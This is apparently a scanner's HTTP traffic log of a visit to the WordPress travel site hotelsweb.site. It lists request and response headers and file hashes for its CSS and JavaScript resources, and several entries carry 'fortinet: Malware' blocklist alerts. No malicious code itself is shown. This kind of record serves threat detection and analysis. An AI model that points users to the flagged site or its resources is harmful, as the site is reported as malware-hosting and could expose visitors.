Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 12898
x-amzn-requestid: 9b594c3c-6b8c-4589-8fcb-b3d7518b46f6
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cQZBNFxToAMF_9A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63833ba1-767f510d72eef86d0cc892df;Sampled=0
x-amzn-remapped-date: Sun, 27 Nov 2022 10:27:45 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: kZfRQsF_Fo2UtTqK0ByOPeQK-IzTQO9JtTmxIMlapmsd93SJk_4VYw==
via: 1.1 d1151317ba32afe0e6370fd69fed222e.cloudfront.net (CloudFront), 1.1 760139201585481b26f947c5f776103a.cloudfront.net (CloudFront), 1.1 google
date: Wed, 30 Nov 2022 21:47:30 GMT
age: 53895
etag: "84241ddddbbfd7de30118307fb1a62800d0a4cb3"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   12898
Md5:    820cf89fcab8380adff42982c9fb11ed
Sha1:   84241ddddbbfd7de30118307fb1a62800d0a4cb3
Sha256: 0d051495f06ac84de934283b40cbfee7a042d32153a73486dd7c017430e882d8
                                        
                                            GET / HTTP/1.1 
Host: hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         199.250.192.223
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
                                        
Date: Thu, 01 Dec 2022 12:45:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=0fcd008c614b44b0c690d2c5ada6541f; path=/
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Location: http://www.hotelsweb.site/
Keep-Alive: timeout=3, max=100
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  
Size:   0
Md5:    d41d8cd98f00b204e9800998ecf8427e
Sha1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /css?family=Poppins%3A100%2C100i%2C200%2C200i%2C300%2C300i%2C400%2C400i%2C500%2C500i%2C600%2C600i%2C700%2C700i%2C800%2C800i%2C900%2C900i%7CMontserrat%3A100%2C100i%2C200%2C200i%2C300%2C300i%2C400%2C400i%2C500%2C500i%2C600%2C600i%2C700%2C700i%2C800%2C800i%2C900%2C900i&ver=4.9.22 HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/

                                         142.250.74.106
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Link: <http://fonts.gstatic.com>; rel=preconnect; crossorigin
Expires: Thu, 01 Dec 2022 12:45:48 GMT
Date: Thu, 01 Dec 2022 12:45:48 GMT
Cache-Control: private, max-age=86400
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin-allow-popups
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff


--- Additional Info ---
Magic:  ASCII text
Size:   1567
Md5:    21fb81ce19453cc2881683648067a1b0
Sha1:   7ae3d5c236bd2c2f2a51281c9360fc4e83194476
Sha256: 84a0c85fe5658c945452a3d3755f80e5231d4970787632bca35682d745e50486
                                        
                                            GET / HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Thu, 01 Dec 2022 12:45:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Link: <http://www.hotelsweb.site/wp-json/>; rel="https://api.w.org/", <http://www.hotelsweb.site/>; rel=shortlink
Set-Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d; path=/
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Keep-Alive: timeout=3, max=100
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (1746), with CRLF, LF line terminators
Size:   58479
Md5:    e7b9c7b0b6a7e46e696d4194b7b539d2
Sha1:   a9f6ac42dcf3ba1b9606b9a740d6797fc50f1527
Sha256: 55a5175ed572ad055c790c6566a2e84a9274588974db9a065efc091a37d07ae2

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/themes/hotel/css/table-4.css?ver=0.7.6 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 16062
Keep-Alive: timeout=3, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with CRLF line terminators
Size:   16062
Md5:    3ed3a9d9f950c83733ee8a82ffa15d8f
Sha1:   28ae6a9613a8ce1e7dfa604abcdc0367a4992827
Sha256: 510dd6b756909b251a65084a163d36b6d243ca7b79d0755906490f339100040b

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/css/lib/pikaday.css HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 4684
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with CRLF line terminators
Size:   4684
Md5:    502e287ce4ca080ead0a8289a15810cc
Sha1:   b06baa0ac62d5b6d2b8fb895407dc2a11c97ba15
Sha256: 88b3e18f3e71a7eaaefeefe989526b561a4794a1bf85463b3c5d1389bbf09b73
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/css/lib/currency_fonts_new/css/fontello.css HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 5496
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with CRLF line terminators
Size:   5496
Md5:    2ceb66a1760edac2ebaa7efaa97f0ca3
Sha1:   d5038e9840fc290c7148f5337a91b21ea78101f4
Sha256: 361a4e9ce04165203f44df41bcbc8fa9c81e95f09053dd89ba7dd6f3b8da8676
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/css/lib/currency_fonts_new/css/animation.css HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 1942
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1942
Md5:    e7da1c1d837b0be2240c2c23bf0c4475
Sha1:   f763298ac4912e0e83793883936107722f130250
Sha256: 5693d3fc7e182e6415edeaf606b8d0ba0d8a6de5d3a94b64b74cf059abd211fa
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/themes/railway/css/main.css?ver=0.7.6 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 20785
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with CRLF line terminators
Size:   20785
Md5:    a206675233c8a964858991eaf645df39
Sha1:   56d5eef6490730d17ca2413848b3fd73958f289c
Sha256: 28da474e6fbe886c4cd0564a89574ef5a46eddd5f350a8fc4281df5ca3049022

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/css/lib/currency_fonts_new/css/TPCurrencyMainNew.css HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 1271
Keep-Alive: timeout=3, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1271
Md5:    1044d55b99a57610129d4618b6620ec1
Sha1:   97aae484ecfdc78d7e13f94404ab3f27f25fa459
Sha256: 4c48338156876c15631f7cc86dd3f700d5b07b4a14202a7e67c8a85df91dcf5d
                                        
                                            GET /wp-content/plugins/travelpayouts/app/public/css/lib/jquery-ui/jquery-ui.min.css HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 14 Aug 2018 02:08:37 GMT
Accept-Ranges: bytes
Content-Length: 25510
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  ASCII text, with very long lines (25087), with CRLF line terminators
Size:   25510
Md5:    eee41be1b916c1472bc4097d5c1f69cd
Sha1:   fc18bca15fab1dcd93756ea120ef0e66ef226a7e
Sha256: 5f86a186f9d6c88457a9d56305917b1801028fcb93ba666e40aa6fc9c2176b21
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/css/wpte-gallery-public.css?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 1666
Keep-Alive: timeout=3, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1666
Md5:    8593ca961b6bd7d62e5944a8d2890730
Sha1:   aea80a2238316cae018f965784dc9d9b81eb0fa8
Sha256: 4f320d5f6be5ecc466850c9180af37035f679c6ab4fe7d3cdfb9bc62035d4438
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/css/datepicker-style.css?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 34718
Keep-Alive: timeout=3, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (2363)
Size:   34718
Md5:    350e77261d50dc43cd08c416859466f7
Sha1:   1abb4c2864d42e3e8a7b3e60496cfe299435f47b
Sha256: bc9b2e8645e879b23d3c82afeb26e27125cb4faefaa295d82d599231bbcc2f40
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/css/wp-travel-engine-public.css?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 32626
Keep-Alive: timeout=3, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   32626
Md5:    369196b6e2e2d1cfb4a24bf651f9fe31
Sha1:   abe9c239a48b7025e3d360a08d5af66e9d180ec5
Sha256: 9bfef4084a5dc8ed59f084800964d46bdee4713a893d06b950ea1f772b4590b4

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Fri, 20 May 2016 15:41:28 GMT
Accept-Ranges: bytes
Content-Length: 10056
Keep-Alive: timeout=3, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (9959)
Size:   10056
Md5:    7121994eec5320fbe6586463bf9651c2
Sha1:   90532aff6d4121954254cdf04994d834f7ec169b
Sha256: 48eb8b500ae6a38617b5738d2b3faec481922a7782246e31d2755c034a45cd5d
                                        
                                            GET /wp-content/themes/travel-agency/style.css?ver=1.1.6 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Fri, 17 Aug 2018 01:26:33 GMT
Accept-Ranges: bytes
Content-Length: 123942
Keep-Alive: timeout=3, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (927), with CRLF line terminators
Size:   123942
Md5:    0035400fa515be65b56ec0820eb80865
Sha1:   5c509fdb41d0e047a95ba258eb8fe7507682f8d4
Sha256: 073713b8fb8325cb226efc4582af8f275c9ed6970286278ae34fdd4d27ff0564

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/css/animate.css?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 59816
Keep-Alive: timeout=3, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (460), with CRLF line terminators
Size:   59816
Md5:    7bc8cbfcaf2442bd7dffd475ba389870
Sha1:   1fac90a899f7121a06b44f3279161cc5202edd7b
Sha256: a3ab8a7883f3c0c6fd615c8d063859df0fb34380a6a85a3b9818a83eade03e3d
                                        
                                            GET /wp-content/plugins/travel-agency-companion/public/js/travel-agency-companion-public.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 1783
Keep-Alive: timeout=3, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1783
Md5:    5ee7d8f5ef7567a2647a64a4dd8e4774
Sha1:   054ed1efbdd786f8ebf06642bbaad7e8a2b05933
Sha256: 70f9b5ce00020e38584b0414f3046b7db807a2c7b8717223090e28365b18f760

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:48 GMT
Server: Apache
Last-Modified: Thu, 05 Sep 2019 11:43:00 GMT
Accept-Ranges: bytes
Content-Length: 96874
Keep-Alive: timeout=3, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (31997)
Size:   96874
Md5:    dc5ba5044fccc0297be7b262ce669a7c
Sha1:   f137ff98ae379e35b0702967d3b6866a0a40e3be
Sha256: cf34e1b87bbfd9d9b185dec994924a496e279d8dc9387ad8d35bc0110134c4d3
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/js/custom.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 774
Keep-Alive: timeout=3, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   774
Md5:    2b79bb9c259d194556e2194f263ac2cc
Sha1:   00644d4ce0034edaa077b4541cef6647af14dc89
Sha256: f1ee9013083fe4a03f133438843cd3c7dbf55f0c35dc5e65b972588fa2c9f862
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/js/wp-travel-engine-public.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 14918
Keep-Alive: timeout=3, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   14918
Md5:    3ef0b718a87c392c04e63fb30cce4f31
Sha1:   a7abc1b1e72be04b95d84af8f0b7e6fb688329ac
Sha256: e48ba9df8e3e8cd41e512dcb41a5e9795da9e90b54486f5c7a3ce2789e069b24

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/js/owl.carousel.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 88643
Keep-Alive: timeout=3, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (360), with CRLF line terminators
Size:   88643
Md5:    cd1dcb9678ef5dfb8c1d54f0a65a59da
Sha1:   d0146e93254743895d306adb31c0affecc9c4f77
Sha256: 2f0b434eae705d0e78d158abdad3a3555f3e69048104a541ba209775e48f86a4
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/js/wpte-gallery-public.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 456
Keep-Alive: timeout=3, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   456
Md5:    ff7c73bff6c6e6b84ce470e70a555da4
Sha1:   a838eea5c11063e64920af10af84500ab86fa012
Sha256: f2755069b539062f40158fb5be93bf08ad17e8d73470fd951069196accf1fff5

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/wp-travel-engine/public/js/wp-travel-engine-travelers-number.js?ver=1.0.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 789
Keep-Alive: timeout=3, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   789
Md5:    04b2b318d9b8998d2276d9776b6a698d
Sha1:   21bc076588fa6fab74e2e577c6599b4307a9a149
Sha256: 09969ab7eb6d0857e1a5b401204220d022464e0b868f299645cb26a75d1f5e71
                                        
                                            GET /wp-includes/js/wp-emoji-release.min.js?ver=4.9.22 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2021 11:06:59 GMT
Accept-Ranges: bytes
Content-Length: 11943
Keep-Alive: timeout=3, max=98
Connection: Keep-Alive


--- Additional Info ---
